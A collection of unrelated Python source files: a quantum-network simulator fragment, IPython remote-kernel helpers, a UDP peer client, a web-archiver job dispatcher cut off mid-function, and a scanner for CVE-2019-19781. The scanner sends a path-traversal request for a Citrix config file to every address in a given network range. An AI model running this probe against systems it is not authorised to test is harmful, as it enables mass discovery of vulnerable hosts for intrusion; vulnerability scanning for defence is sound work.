except nx.NodeNotFound:
Logger.get_instance().error("route couldn't be calculated, node doesn't exist")
except ValueError:
Logger.get_instance().error("route couldn't be calculated, value error")
except Exception as e:
Logger.get_instance().error('Error in network: ' + str(e))
def send(self, packet):
"""
Puts the packet to the packet queue of the network.
Args:
packet (Packet): Packet to be sent
"""
self._packet_queue.put(packet)
def stop(self, stop_hosts=False):
"""
Stops the network.
"""
Logger.get_instance().log("Network stopped")
try:
if stop_hosts:
for host in self.ARP:
self.ARP[host].stop(release_qubits=True)
self.send(None) # Send None to queue to stop the queue
if self._backend is not None:
self._backend.stop()
except Exception as e:
Logger.get_instance().error(e)
def start(self, nodes=None, backend=None):
"""
Starts the network.
"""
if backend is None:
self._backend = EQSNBackend()
else:
self._backend = backend
if nodes is not None:
self._backend.start(nodes=nodes)
self._queue_processor_thread = DaemonThread(target=self._process_queue)
def draw_classical_network(self):
"""
Draws a plot of the network.
"""
nx.draw_networkx(self.classical_network, pos=nx.spring_layout(self.classical_network),
with_labels=True)
plt.show()
def draw_quantum_network(self):
"""
Draws a plot of the network.
"""
nx.draw_networkx(self.quantum_network, pos=nx.spring_layout(self.quantum_network),
with_labels=True)
plt.show()
def _encode(self, route, payload, ttl=10):
"""
Adds another layer to the packet if route length between sender and receiver is greater than 2. Sets the
protocol flag in this layer to RELAY and payload_type as SIGNAL and adds a variable
Time-To-Live information in this layer.
Args:
route: route of the packet from sender to receiver
payload (Object): Lower layers of the packet
ttl(int): Time-to-Live parameter
Returns:
RoutingPacket: Encoded RELAY packet
"""
if payload.protocol != Constants.RELAY:
packet = RoutingPacket(route[1], '', Constants.RELAY, Constants.SIGNAL,
payload, ttl, route)
else:
packet = payload
packet.sender = route[1]
if self.use_hop_by_hop:
packet.receiver = route[-1]
else:
packet.receiver = route[2]
return packet
|
_ipython_utils.py
|
"""Utilities for integrating with IPython
These functions should probably reside in Jupyter and IPython repositories,
after which we can import them instead of having our own definitions.
"""
import atexit
import os
try:
import queue
except ImportError:
# Python 2
import Queue as queue
from subprocess import Popen
import sys
from threading import Thread
from uuid import uuid4
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
from threading import Event
from IPython import get_ipython
from jupyter_client import BlockingKernelClient, write_connection_file
from jupyter_core.paths import jupyter_runtime_dir
OUTPUT_TIMEOUT = 10
def run_cell_remote(ip, kc, cell):
"""Run a cell on a KernelClient
Any output from the cell will be redisplayed in the local session.
"""
msg_id = kc.execute(cell)
in_kernel = getattr(ip, "kernel", False)
if in_kernel:
socket = ip.display_pub.pub_socket
session = ip.display_pub.session
parent_header = ip.display_pub.parent_header
while True:
try:
msg = kc.get_iopub_msg(timeout=OUTPUT_TIMEOUT)
except queue.Empty:
raise TimeoutError("Timeout waiting for IPython output")
if msg["parent_header"].get("msg_id") != msg_id:
continue
msg_type = msg["header"]["msg_type"]
content = msg["content"]
if msg_type == "status":
if content["execution_state"] == "idle":
# idle means output is done
break
elif msg_type == "stream":
stream = getattr(sys, content["name"])
stream.write(content["text"])
elif msg_type in ("display_data", "execute_result", "error"):
if in_kernel:
session.send(socket, msg_type, content, parent=parent_header)
else:
if msg_type == "error":
print("\n".join(content["traceback"]), file=sys.stderr)
else:
sys.stdout.write(content["data"].get("text/plain", ""))
else:
pass
def register_worker_magic(connection_info, magic_name="worker"):
"""Register a %worker magic, given connection_info.
Both a line and cell magic are registered,
which run the given cell in a remote kernel.
"""
ip = get_ipython()
info = dict(connection_info) # copy
key = info.pop("key")
kc = BlockingKernelClient(**connection_info)
kc.session.key = key
kc.start_channels()
def remote(line, cell=None):
"""Run the current cell on a remote IPython kernel"""
if cell is None:
# both line and cell magic
cell = line
run_cell_remote(ip, kc, cell)
remote.client = kc # preserve reference on kc, largely for mocking
ip.register_magic_function(remote, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote, magic_kind="cell", magic_name=magic_name)
def remote_magic(line, cell=None):
"""A magic for running code on a specified remote worker
The connection_info dict of the worker will be looked up
as the first positional arg to the magic.
The rest of the line (or the entire cell for a %%cell magic)
will be passed to the remote kernel.
Usage:
info = e.start_ipython(worker)[worker]
%remote info print(worker.data)
"""
# get connection info from IPython's user namespace
ip = get_ipython()
split_line = line.split(None, 1)
info_name = split_line[0]
if info_name not in ip.user_ns:
raise NameError(info_name)
connection_info = dict(ip.user_ns[info_name])
if not cell: # line magic, use the rest of the line
if len(split_line) == 1:
raise ValueError("I need some code to run!")
cell = split_line[1]
# turn info dict to hashable str for use as lookup key in _clients cache
key = ",".join(map(str, sorted(connection_info.items())))
session_key = connection_info.pop("key")
if key in remote_magic._clients:
kc = remote_magic._clients[key]
else:
kc = BlockingKernelClient(**connection_info)
kc.session.key = session_key
kc.start_channels()
kc.wait_for_ready(timeout=10)
remote_magic._clients[key] = kc
# actually run the code
run_cell_remote(ip, kc, cell)
# cache clients for re-use in remote magic
remote_magic._clients = {}
def register_remote_magic(magic_name="remote"):
"""Define the parameterized %remote magic
See remote_magic above for details.
"""
ip = get_ipython()
if ip is None:
return # do nothing if IPython's not running
ip.register_magic_function(remote_magic, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote_magic, magic_kind="cell", magic_name=magic_name)
def connect_qtconsole(connection_info, name=None, extra_args=None):
"""Open a QtConsole connected to a worker who has the given future
- identify worker with who_has
- start IPython kernel on the worker
- start qtconsole connected to the kernel
"""
runtime_dir = jupyter_runtime_dir()
if name is None:
name = uuid4().hex
path = os.path.join(runtime_dir, name + ".json")
write_connection_file(path, **connection_info)
cmd = ["jupyter", "qtconsole", "--existing", path]
if extra_args:
cmd.extend(extra_args)
Popen(cmd)
@atexit.register
def _cleanup_connection_file():
"""Cleanup our connection file when we exit."""
try:
os.remove(path)
except OSError:
pass
def start_ipython(ip=None, ns=None, log=None):
"""Start an IPython kernel in a thread
Parameters
----------
ip : str
The IP address to listen on (likely the parent object's ip).
ns : dict
Any names that should be injected into the IPython namespace.
log : logger instance
Hook up IPython's logging to an existing logger instead of the default.
"""
from IPython import get_ipython
if get_ipython() is not None:
raise RuntimeError("Cannot start IPython, it's already running.")
from zmq.eventloop.ioloop import ZMQIOLoop
from ipykernel.kernelapp import IPKernelApp
# save the global IOLoop instance
# since IPython relies on it, but we are going to put it in a thread.
save_inst = IOLoop.instance()
IOLoop.clear_instance()
zmq_loop = ZMQIOLoop()
zmq_loop.install()
# start IPython, disabling its signal handlers that won't work due to running in a thread:
app = IPKernelApp.instance(log=log)
# Don't connect to the history database
app.config.HistoryManager.hist_file = ":memory:"
# listen on all interfaces, so remote clients can connect:
if ip:
app.ip = ip
# disable some signal handling, logging
def noop():
return None
app.init_signal = noop
app.log_connection_info = noop
# start IPython in a thread
# initialization happens in the thread to avoid threading problems
# with the sqlite history
evt = Event()
def _start():
app.initialize([])
app.kernel.pre_handler_hook = noop
app.kernel.post_handler_hook = noop
app.kernel.start()
app.kernel.loop = IOLoop.instance()
# save self in the IPython namespace as 'worker'
# inject things into the IPython namespace
if ns:
app.kernel.shell.user_ns.update(ns)
evt.set()
zmq_loop.start()
zmq_loop_thread = Thread(target=_start)
zmq_loop_thread.daemon = True
zmq_loop_thread.start()
assert evt.wait(timeout=5), "IPython didn't start in a reasonable amount of time."
# put the global IOLoop instance back:
IOLoop.clear_instance()
save_inst.install()
return app
|
udp.py
|
import socket
import sys
import traceback
import struct
import threading
from threading import Thread
import time
import datetime
import json
import buffered_message
from connection_state import ConnectionState
import uuid
# *************
# EXAMPLE USAGE
# *************
"""
import socket
import udp
def connect1(ip, port):
print "%s [%s]: new connection received at client 1" % (ip, port)
def connect2(ip, port):
print "%s [%s]: new connection received at client 2" % (ip, port)
def message1(ip, port):
print "%s [%s]: message received at client 1" % (ip, port)
def message2(ip, port):
print "%s [%s]: message received at client 2" % (ip, port)
def timeout1(ip, port):
print "%s [%s]: timeout at client 1" % (ip, port)
def timeout2(ip, port):
print "%s [%s]: timeout at client 2" % (ip, port)
def disconnect1(ip, port):
print "%s [%s]: peer disconnection at client 1" % (ip, port)
def disconnect2(ip, port):
print "%s [%s]: peer disconnection at client 2" % (ip, port)
def failed_connect1(ip, port):
print "%s [%s]: connection to this peer FAILED at client 1" % (ip, port)
def failed_connect2(ip, port):
print "%s [%s]: connection to this peer FAILED at client 2" % (ip, port)
client1_ip = socket.gethostbyname(socket.gethostname())
client1_port = 29779
client2_ip = socket.gethostbyname(socket.gethostname())
client2_port = 29778
buffer_size = 128
client1 = udp.UDP_Client(True, client1_ip, client1_port, client2_ip, client2_port, buffer_size, True, failed_connect1, message1, timeout1, connect1, disconnect1, True)
client2 = udp.UDP_Client(True, client2_ip, client2_port, client1_ip, client1_port, buffer_size, True, failed_connect2, message2, timeout2, connect2, disconnect2, True)
client1.send_message([5,6,7], True)
client2.pop_message(True)
client2.send_message("Message from client2.")
client1.pop_message()
client1.disconnect()
client2.disconnect()
"""
class UDP_Client:
def __init__(
self,
start_listen_thread=False,
local_ip=socket.gethostbyname(socket.gethostname()),
local_port=29779,
target_ip=socket.gethostbyname(socket.gethostname()),
target_port=29778,
buffer_size=1024,
keep_alive=False,
failed_to_connect_callback=None,
message_received_callback=None,
keep_alive_timeout_callback=None,
new_peer_connected_callback=None,
peer_disconnected_callback=None,
require_ack=False,
):
self.target_ip = target_ip
self.target_port = target_port
self.keep_alive = keep_alive
self.failed_to_connect_callback = failed_to_connect_callback
self.message_received_callback = message_received_callback
self.keep_alive_timeout_callback = keep_alive_timeout_callback
self.new_peer_connected_callback = new_peer_connected_callback
self.peer_disconnected_callback = peer_disconnected_callback
self.require_ack = require_ack
self.connected_peers = {
# "<ip>_<port>" : [connected_timestamp, last_message_received_timestamp, keep-alive_check_count]
}
self.buffer_size = buffer_size
self.message_manager = buffered_message.Buffered_Message_Manager(self.buffer_size)
self.timeout = 3.0
self.send_queue = []
self.thread_sleep_duration = 0.1
self.keep_alive_timeout = 30; # 30 seconds
#self.keep_alive_timestamp = time.time()
self.keep_alive_interval = 3
self.keep_alive_send_timestamp = time.time()
self.peer_username = ""; # username belonging to remote peer
self.error_log = []
self.resend_interval = 3 # used when require_ack = True
# track previous deliberate disconnections to make sure keep-alive functionality doesn't resurrect those connections.
self.disconnected_peers = {
#"<ip>_<port>": <disconnection timestamp>
}
self.disconnect_lockout_duration = self.keep_alive_interval * 2
self.bind_socket(local_ip, local_port)
self.connection_state = ConnectionState(False)
if(start_listen_thread):
self.start_listening()
self.connection_attempt_timeout = 5 # seconds
self.received_acks = []
def connect_async(self, target_ip, target_port):
Thread(target=self.connect, args=(target_ip, target_port)).start()
def connect(self, target_ip, target_port):
peer = "%s_%s" % (target_ip, target_port)
# send keep-alive packet
self.send_message("1", False, False, target_ip, int(target_port))
start_time = time.time()
time_elapsed = 0
while peer not in self.connected_peers:
time.sleep(0.5)
time_elapsed = time.time() - start_time
if time_elapsed > self.connection_attempt_timeout:
if self.failed_to_connect_callback != None:
self.failed_to_connect_callback(target_ip, int(target_port))
return False
return True
def init_socket(self):
try:
# close open socket, if there are any.
if(hasattr(self, "sock")):
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
except:
pass
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def handle_peer_disconnect(self, peer):
self.disconnected_peers[peer] = time.time()
addr = peer.split("_")
del self.connected_peers[peer]
if self.peer_disconnected_callback != None:
self.peer_disconnected_callback(addr[0], int(addr[1]))
def bind_socket(self, local_ip=socket.gethostbyname(socket.gethostname()), local_port=29779):
self.local_port = local_port
self.local_ip = local_ip
# (Re)initialize socket before binding.
self.init_socket()
self.sock.settimeout(self.timeout)
self.sock.bind((local_ip, local_port))
def prepend_unique_id(self, message):
return "%s__%s" % (str(uuid.uuid4()), message)
def send_message(self, message, json_encode=False, prepare=True, _target_ip=None, _target_port=None):
target_ip = _target_ip if _target_ip != None else self.target_ip
target_port = _target_port if _target_port != None else self.target_port
# !!! WARNING !!!
# If you pass prepare as False, you MUST ensure message doesn't exceed buffer-size yourself.
msg = message
if(json_encode):
msg = json.dumps(msg)
messages = [[self.prepend_unique_id(msg), 0],]
prepared_message_packets = [messages, target_ip, target_port]
if prepare:
messages = [[self.prepend_unique_id(message), 0] for message in self.message_manager.prepare_message(msg)]
prepared_message_packets = [messages, target_ip, target_port]
self.send_queue.append(prepared_message_packets)
def keep_alive_send_check(self):
for peer, timestamps in self.connected_peers.items():
addr = peer.split("_")
ip, port = [addr[0], int(addr[1])]
now = time.time()
diff = now - timestamps[1] #self.keep_alive_send_timestamp
next_check_time = self.keep_alive_interval * (timestamps[2] + 1)
if diff > next_check_time:
self.connected_peers[peer][2] += 1
self.connected_peers[peer][1] = now
self.send_message("1", False, False, ip, port)
def send_message_loop(self):
connection_state = self.connection_state
prepared_message_packets, target_ip, target_port, last_sent = [None, None, None, None]
while connection_state.active:
if self.keep_alive:
self.keep_alive_send_check()
message_count = len(self.send_queue)
index = -1
for i in range(0, message_count):
index += 1
if not self.require_ack:
prepared_message_packets, target_ip, target_port = self.send_queue.pop(0)
else:
prepared_message_packets, target_ip, target_port = self.send_queue[index]
packet_index = -1
for j in range(0, len(prepared_message_packets)):
packet_index += 1
packet, last_sent = prepared_message_packets[packet_index]
if last_sent != 0 and self.require_ack:
sent_timestamp = time.time()
packet_id, packet = packet.split("__", 1)
if packet_id in self.received_acks:
del self.send_queue[index][0][packet_index]
packet_index -= 1
if len(self.send_queue[index][0]) < 1:
del self.send_queue[index]
index -= 1
continue
now = time.time()
time_difference = now - last_sent
if time_difference < self.resend_interval:
continue
# update the last sent timestamp for this packet
if self.require_ack:
self.send_queue[index][0][j][1] = time.time()
try:
self.sock.sendto(packet, (target_ip, target_port))
except:
# todo: handle packet send timeout
pass
time.sleep(self.thread_sleep_duration)
def keep_alive_loop(self):
connection_state = self.connection_state
while connection_state.active:
self.send_message("1", False, False)
def stop_listening(self):
self.connection_state.active = False
try:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
except:
pass
def start_listening(self):
if(not self.connection_state.active):
self.connection_state = ConnectionState(True)
Thread(target=self.recv_message_loop).start()
Thread(target=self.send_message_loop).start()
return True
return False
def disconnect_from_peer(self, peer_ip, peer_port):
peer = "%s_%s" % (peer_ip, peer_port)
if peer not in self.connected_peers:
return False
self.disconnected_peers[peer] = time.time()
peer_port = int(peer_port)
self.send_message("2", False, False, peer_ip, peer_port)
del self.connected_peers[peer]
return True
def disconnect(self):
for peer, timestamps in self.connected_peers.items():
addr = peer.split("_")
ip, port = [addr[0], int(addr[1])]
self.send_message("2", False, False, ip, port)
time.sleep(0.5)
self.connected_peers.clear()
self.stop_listening()
def reconnect(self):
self.disconnect()
time.sleep(self.disconnect_lockout_duration + 0.5)
self.bind_socket(self.local_ip, self.local_port)
self.start_listening()
def new_connection(self, local_ip=socket.gethostbyname(socket.gethostname()), local_port=29779):
self.disconnect()
self.bind_socket(local_ip, local_port)
def check_keep_alive(self):
for peer, timestamps in self.connected_peers.items():
addr = peer.split("_")
now = time.time()
timestamp = timestamps[0]
diff = now - timestamp; #self.keep_alive_timestamp
if(diff > self.keep_alive_timeout):
del self.connected_peers[peer]
if self.keep_alive_timeout_callback != None:
self.keep_alive_timeout_callback(addr[0], int(addr[1]))
elif self.peer_disconnected_callback != None:
self.peer_disconnected_callback(addr[0], int(addr[1]))
#self.disconnect()
#err_msg = "[UDP_Client]: Client connection timed out. (peer: IP: %s Port: %s Username: %s)" % (self.target_ip, self.target_port, self.peer_username)
#timestamp = time.time()
#date_string = datetime.datetime.fromtimestamp(timestamp).strftime('(%Y-%m-%d) %H:%M:%S')
#self.error_log.append((timestamp, date_string, err_msg))
# Run this as its own thread.
def recv_message_loop(self):
connection_state = self.connection_state
while connection_state.active:
#time.sleep(0.001)
if self.keep_alive:
self.check_keep_alive()
data_raw = None
data = None
addr = None
try:
data_raw, addr = self.sock.recvfrom(self.buffer_size)
except:
continue
packet_id = None
if "__" in data_raw:
packet_id, data = data_raw.split("__", 1)
else:
data = data_raw
peer = "%s_%s" % (addr[0], addr[1])
ip, port = [addr[0], int(addr[1])]
if peer in self.disconnected_peers:
disconnect_limit = self.disconnected_peers[peer] + self.disconnect_lockout_duration
now = time.time()
# should we ignore this message?
if now <= disconnect_limit:
continue
# check if peer is new or not and update keep-alive info
if peer not in self.connected_peers:
if self.new_peer_connected_callback != None:
self.new_peer_connected_callback(addr[0], int(addr[1]))
self.connected_peers[peer] = [int(time.time()), 0, 0]
else:
self.connected_peers[peer][0] = int(time.time())
self.connected_peers[peer][2] = 0 # reset the keep-alive check counter on received messages.
if self.keep_alive:
if data == "1":
#self.keep_alive_timestamp = time.time()
continue
self.send_message("1", False, False, ip, port)
if data == "2":
# peer is disconnecting.
self.handle_peer_disconnect(peer)
continue
if (len(data) > 2) and (data[:3]).lower() == "ack":
# clear associated message from the message queue.
ack_token, ack_id = data.split(" ", 1)
self.received_acks.append(ack_id)
continue
timestamp = time.time()
self.message_manager.handle_raw_message(data, addr, timestamp)
# send ack for this packet.
self.send_message("ack %s" % packet_id, False, False, ip, port)
#print "UDP duration: %s" % (time.time() - timestamp)
if self.message_received_callback != None:
self.message_received_callback(ip, port)
# Returns a list: [addr, timestamp, message]
def pop_message(self, decode_json=False):
return self.message_manager.pop_message(decode_json)
# Returns a list of lists: [[addr, timestamp, message], ...]
def pop_all_messages(self, decode_json=False):
return self.message_manager.pop_all_messages(decode_json)
|
cve_2019_19781_scanner.py
|
#!/usr/bin/env python3
import argparse
import multiprocessing
import ipaddress
import requests
from requests import ReadTimeout, ConnectTimeout, ConnectionError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import TooManyRedirects
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def worker(targets, port):
for target in targets:
try:
print('Testing: {}'.format(target), end='\r')
if port == '80':
req = requests.get('http://{}:{}/vpn/../vpns/cfg/smb.conf'.format(target, port), verify=False, timeout=2)
else:
req = requests.get('https://{}:{}/vpn/../vpns/cfg/smb.conf'.format(target, port), verify=False, timeout=2)
if ('[global]') and ('encrypt passwords') and('name resolve order') in str(req.content):
print('[\033[89m!\033[0m] This Citrix ADC Server: {} is still vulnerable to CVE-2019-19781'.format(target))
elif ('Citrix') in str(req.content) or req.status_code == 403:
print('[\033[92m*\033[0m] CITRIX Server found, However the server {} is not vulnerable'.format(target))
except (ReadTimeout, TooManyRedirects, ConnectTimeout, ConnectionError):
pass
def argparser():
parser = argparse.ArgumentParser()
parser.add_argument('target', help='the vulnerable server with Citrix (defaults https)')
parser.add_argument('port', help='the target server web port (normally on 443)')
return parser.parse_args()
if __name__ == '__main__':
args = argparser()
ip_list = [str(ip) for ip in ipaddress.IPv4Network(args.target)]
jobs = []
threads = 512
amount = round(len(ip_list) / threads)
limit = amount
for f in range(threads):
ips = ip_list[limit - amount:limit]
j = multiprocessing.Process(target=worker, args=(ips, 443),)
jobs.append(j)
j.start()
limit = limit + amount
for j in jobs:
j.join()
|
RawJobDispatcher.py
|
import sys
import multiprocessing
import threading
import time
import traceback
import queue
import random
import datetime
import signal
import socket
import settings
import WebMirror.JobUtils
import RawArchiver.misc
import common.NetlocThrottler
import common.get_rpyc
import common.util.urlFuncs
import common.process
import common.LogBase as LogBase
import common.StatsdMixin as StatsdMixin
# import sqlalchemy.exc
# from sqlalchemy.sql import text
if '__pypy__' in sys.builtin_module_names:
import psycopg2cffi as psycopg2
else:
import psycopg2
########################################################################################################################
#
# ## ## ### #### ## ## ###### ## ### ###### ######
# ### ### ## ## ## ### ## ## ## ## ## ## ## ## ## ##
# #### #### ## ## ## #### ## ## ## ## ## ## ##
# ## ### ## ## ## ## ## ## ## ## ## ## ## ###### ######
# ## ## ######### ## ## #### ## ## ######### ## ##
# ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ##
# ## ## ## ## #### ## ## ###### ######## ## ## ###### ######
#
########################################################################################################################
NO_JOB_TIMEOUT_MINUTES = 15
largv = [tmp.lower() for tmp in sys.argv]
if "twoprocess" in largv or "oneprocess" in largv:
MAX_IN_FLIGHT_JOBS = 2
else:
# MAX_IN_FLIGHT_JOBS = 5
MAX_IN_FLIGHT_JOBS = 75
# MAX_IN_FLIGHT_JOBS = 250
# MAX_IN_FLIGHT_JOBS = 500
# MAX_IN_FLIGHT_JOBS = 1000
# MAX_IN_FLIGHT_JOBS = 3000
LOCAL_ENQUEUED_JOB_RESPONSES = 50
class RawJobFetcher(LogBase.LoggerMixin, StatsdMixin.StatsdMixin):
loggerPath = "Main.RawJobFetcher"
statsd_prefix = 'ReadableWebProxy.Proc.RawDispatcherManager'
def __init__(self):
# print("Job __init__()")
super().__init__()
self.last_rx = datetime.datetime.now()
self.active_jobs = 0
self.jobs_out = 0
self.jobs_in = 0
self.run_flag = multiprocessing.Value("b", 1, lock=False)
self.ratelimiter = common.NetlocThrottler.NetlockThrottler(key_prefix='raw', fifo_limit = 100 * 1000)
self.count_lock = threading.Lock()
self.limiter_lock = threading.Lock()
self.local = threading.local()
# This queue has to be a multiprocessing queue, because it's shared across multiple processes.
self.normal_out_queue = multiprocessing.Queue(maxsize=MAX_IN_FLIGHT_JOBS * 2)
self.fetch_procs = [
threading.Thread(target=self.filler_run_shim, args=('priority', )),
threading.Thread(target=self.filler_run_shim, args=('new_fetch', )),
threading.Thread(target=self.filler_run_shim, args=('random', )),
threading.Thread(target=self.drainer_run_shim),
]
for proc in self.fetch_procs:
proc.start()
self.print_mod = 0
def filler_run_shim(self, mode):
try:
self.queue_filler_proc(mode)
except KeyboardInterrupt:
print("Saw keyboard interrupt. Breaking!")
return
except Exception:
print("Error!")
print("Error!")
print("Error!")
print("Error!")
traceback.print_exc()
with open("error %s - %s.txt" % ("rawjobdispatcher", time.time()), "w") as fp:
fp.write("Manager crashed?\n")
fp.write(traceback.format_exc())
raise
def drainer_run_shim(self):
self.local.db_interface = psycopg2.connect(
database = settings.DATABASE_DB_NAME,
user = settings.DATABASE_USER,
password = settings.DATABASE_PASS,
host = settings.DATABASE_IP,
)
try:
self.queue_drainer_proc()
except KeyboardInterrupt:
print("Saw keyboard interrupt. Breaking!")
return
except Exception:
print("Error!")
print("Error!")
print("Error!")
print("Error!")
traceback.print_exc()
with open("error %s - %s.txt" % ("rawjobdispatcher", time.time()), "w") as fp:
fp.write("Manager crashed?\n")
fp.write(traceback.format_exc())
raise
def outbound_job_wanted(self, netloc, joburl):
bad = common.util.urlFuncs.hasDuplicateSegments(joburl)
if bad:
self.log.warn("Unwanted URL (pathchunks): '%s' - %s", joburl, bad)
return False
if joburl.startswith("data:"):
self.log.warn("Data URL: '%s' - %s", joburl, netloc)
return False
if joburl.startswith("mailto:"):
self.log.warn("Email URL: '%s' - %s", joburl, netloc)
return False
if not joburl.startswith("http"):
self.log.warn("Non HTTP URL: '%s' - %s", joburl, netloc)
return False
for module in RawArchiver.RawActiveModules.ACTIVE_MODULES:
if module.cares_about_url(joburl):
return True
self.log.warn("Unwanted URL: '%s' - %s", joburl, netloc)
return False
def outbound_job_disabled(self, netloc, joburl):
for module in RawArchiver.RawActiveModules.ACTIVE_MODULES:
if module.cares_about_url(joburl):
if module.is_disabled(netloc, joburl):
self.log.warn("Disabled fetching for URL: '%s' - %s", joburl, netloc)
return True
return False
def get_queue(self):
return self.normal_out_queue
def join_proc(self):
self.run_flag.value = 0
for _ in range(60 * 5):
for proc in self.fetch_procs:
proc.join(timeout=1)
if any([tmp.is_alive() for tmp in self.fetch_procs]) is False:
return
self.log.info("Waiting for job dispatcher to join. Currently active jobs in queue: %s, states: %s",
self.normal_out_queue.qsize(),
[tmp.is_alive() for tmp in self.fetch_procs]
)
while True:
for proc in self.fetch_procs:
proc.join(timeout=1)
if any([tmp.is_alive() for tmp in self.fetch_procs]) is False:
return
self.log.error("Timeout when waiting for join. Bulk consuming from intermediate queue. States: %s",
[tmp.is_alive() for tmp in self.fetch_procs],
)
try:
while 1:
self.normal_out_queue.get_nowait()
except queue.Empty:
pass
def put_outbound_job(self, jobid, joburl, netloc=None):
self.log.info("Dispatching new job (active jobs: %s of %s)", self.active_jobs, MAX_IN_FLIGHT_JOBS)
raw_job = WebMirror.JobUtils.buildjob(
module = 'SmartWebRequest',
call = 'smartGetItem',
dispatchKey = "fetcher",
jobid = jobid,
args = [joburl],
kwargs = {},
additionalData = {'mode' : 'fetch', 'netloc' : netloc},
postDelay = 0
)
# Recycle the rpc interface if it ded
while 1:
try:
self.local.rpc_interface.put_job(raw_job)
with self.count_lock:
self.active_jobs += 1
self.jobs_out += 1
with self.mon_con.pipeline() as pipe:
pipe.gauge('active_jobs', self.active_jobs)
pipe.gauge('jobs_out', self.jobs_out)
pipe.gauge('jobs_in', self.jobs_in)
pipe.gauge('qsize', self.normal_out_queue.qsize())
return
except TypeError:
self.open_rpc_interface()
except KeyError:
self.open_rpc_interface()
except socket.timeout:
self.open_rpc_interface()
except ConnectionRefusedError:
self.open_rpc_interface()
def fill_jobs(self, mode):
if 'drain' in sys.argv:
return
escape_count = 0
while self.active_jobs < MAX_IN_FLIGHT_JOBS and escape_count < 25 and self.normal_out_queue.qsize() < LOCAL_ENQUEUED_JOB_RESPONSES:
old = self.normal_out_queue.qsize()
num_new = self._get_task_internal(mode)
self.log.info("Need to add jobs to the job queue (%s active, %s added)!", self.active_jobs, self.active_jobs-old)
if self.run_flag.value != 1:
return
with self.limiter_lock:
new_j_l =self.ratelimiter.get_available_jobs()
for rid, joburl, netloc in new_j_l:
self.put_outbound_job(rid, joburl, netloc)
# If there weren't any new items, stop looping because we're not going anywhere.
if num_new == 0:
break
escape_count += 1
def open_rpc_interface(self):
try:
self.local.rpc_interface.close()
except Exception: # pylint: disable=W0703
pass
for _ in range(100):
try:
self.local.rpc_interface = common.get_rpyc.RemoteJobInterface("RawMirror")
return
except TypeError:
pass
except KeyError:
pass
except socket.timeout:
pass
except ConnectionRefusedError:
pass
raise RuntimeError("Could not establish connection to RPC remote!")
def process_responses(self):
while 1:
# Something in the RPC stuff is resulting in a typeerror I don't quite
# understand the source of. anyways, if that happens, just reset the RPC interface.
try:
tmp = self.local.rpc_interface.get_job()
with self.count_lock:
self.active_jobs -= 1
self.jobs_in += 1
if self.active_jobs < 0:
self.active_jobs = 0
except queue.Empty:
return
except TypeError:
self.open_rpc_interface()
return
except KeyError:
self.open_rpc_interface()
return
except socket.timeout:
self.open_rpc_interface()
return
except ConnectionRefusedError:
self.open_rpc_interface()
return
except OSError:
self.open_rpc_interface()
return
if tmp:
nl = None
if 'extradat' in tmp and 'netloc' in tmp['extradat']:
nl = tmp['extradat']['netloc']
if nl:
with self.limiter_lock:
if 'success' in tmp and tmp['success']:
self.ratelimiter.netloc_ok(nl)
else:
print("Success val: ", 'success' in tmp, list(tmp.keys()))
self.ratelimiter.netloc_error(nl)
else:
self.log.warning("Missing netloc in response extradat!")
self.log.info("Job response received. Jobs in-flight: %s (qsize: %s)", self.active_jobs, self.normal_out_queue.qsize())
self.last_rx = datetime.datetime.now()
self.blocking_put_response(("processed", tmp))
else:
self.print_mod += 1
if self.print_mod > 20:
self.log.info("No job responses available.")
self.print_mod = 0
time.sleep(1)
break
def blocking_put_response(self, item):
while self.run_flag.value == 1:
try:
self.normal_out_queue.put_nowait(item)
return
except queue.Full:
self.log.warning("Response queue full (%s items). Sleeping", self.normal_out_queue.qsize())
time.sleep(1)
def queue_filler_proc(self, mode):
common.process.name_process("raw job filler worker")
self.open_rpc_interface()
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except ValueError:
self.log.warning("Cannot configure job fetcher task to ignore SIGINT. May be an issue.")
self.log.info("Job queue fetcher starting.")
msg_loop = 0
retries = 0
while self.run_flag.value == 1:
try:
self.local.db_interface = psycopg2.connect(
database = settings.DATABASE_DB_NAME,
user = settings.DATABASE_USER,
password = settings.DATABASE_PASS,
host = settings.DATABASE_IP,
)
while self.run_flag.value == 1:
self.fill_jobs(mode)
msg_loop += 1
time.sleep(0.2)
if msg_loop > 25:
self.log.info("Job queue filler process (%s). In-Flight: %s, waiting: %s (out: %s, in: %s). Runstate: %s",
mode,
self.active_jobs,
self.normal_out_queue.qsize(),
self.jobs_out,
self.jobs_in,
self.run_flag.value==1)
retries = 0
msg_loop = 0
except psycopg2.Error:
self.log.error("Exception in psycopg2 in filler process!")
for line in traceback.format_exc().split("\n"):
self.log.error(line)
retries += 1
if retries > 5:
raise
self.log.info("Job queue fetcher saw exit flag. Halting.")
self.local.rpc_interface.close()
# Consume the remaining items in the output queue so it shuts down cleanly.
try:
while 1:
self.normal_out_queue.get_nowait()
except queue.Empty:
pass
self.log.info("Job queue filler process. Current job queue size: %s. ", self.active_jobs)
self.log.info("Job queue fetcher halted.")
def queue_drainer_proc(self):
common.process.name_process("raw job filler worker")
self.open_rpc_interface()
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except ValueError:
self.log.warning("Cannot configure job fetcher task to ignore SIGINT. May be an issue.")
self.log.info("Job queue fetcher starting.")
msg_loop = 0
while self.run_flag.value == 1:
self.process_responses()
msg_loop += 1
time.sleep(0.2)
if msg_loop > 25:
self.log.info("Job queue filler process. Current job queue size: %s (out: %s, in: %s). Runstate: %s", self.active_jobs, self.jobs_out, self.jobs_in, self.run_flag.value==1)
msg_loop = 0
with self.limiter_lock:
self.ratelimiter.job_reduce()
self.log.info("Job queue fetcher saw exit flag. Halting.")
self.local.rpc_interface.close()
# Consume the remaining items in the output queue so it shuts down cleanly.
try:
while 1:
self.normal_out_queue.get_nowait()
except queue.Empty:
pass
self.log.info("Job queue filler process. Current job queue size: %s. ", self.active_jobs)
self.log.info("Job queue fetcher halted.")
def _get_task_internal(self, mode):
cursor = self.local.db_interface.cursor()
# Hand-tuned query, I couldn't figure out how to
# get sqlalchemy to emit /exactly/ what I wanted.
